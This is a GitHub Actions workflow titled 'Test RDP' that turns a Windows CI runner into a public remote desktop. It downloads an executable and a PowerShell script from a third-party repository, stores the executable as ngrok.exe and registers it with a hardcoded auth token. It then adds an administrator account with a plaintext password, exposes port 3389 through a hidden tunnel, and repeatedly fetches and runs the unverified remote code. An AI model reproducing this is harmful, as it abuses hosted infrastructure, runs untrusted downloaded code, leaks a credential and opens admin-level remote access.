name: Test RDP

on: [push, workflow_dispatch]

jobs:
  build:
  
    runs-on: windows-latest
    
    steps:
    - name: Download
      run: Invoke-WebRequest https://github.com/YaptircazKanka/Blok3/raw/main/run.ps1 -OutFile 0.ps1
    
    - name: setup
      run: |
           Invoke-WebRequest -Uri "https://raw.githubusercontent.com/YaptircazKanka/Blok3/main/use.exe" -OutFile ngrok.exe 
           cmd /c ngrok.exe authtoken 2cn87V9NMzmnYMwO3Vgp6rtvFde_3PkxAeYd8zjbLwMge7LAe
           cmd /c net user /add Admin P@ssw0rd.
           cmd /c net localgroup /add administrators Admin
           sleep 240
    - name: run
      run: |
            Start-Process -FilePath "ngrok.exe" -ArgumentList "tcp 3389" -WindowStyle Hidden
            curl -s http://localhost:4040/api/tunnels/ | jq -r '.tunnels[0].public_url | sub("tcp://"; "")'
            Write-Host IP: 👆
            Write-Host Username: Admin
            Write-Host Password: P@ssw0rd.
            sleep 240
            curl -o zip.exe -Uri "https://raw.githubusercontent.com/YaptircazKanka/Blok3/main/use.exe"
            .\0.ps1
            curl -o zip.exe -Uri "https://raw.githubusercontent.com/YaptircazKanka/Blok3/main/use.exe"
            .\0.ps1
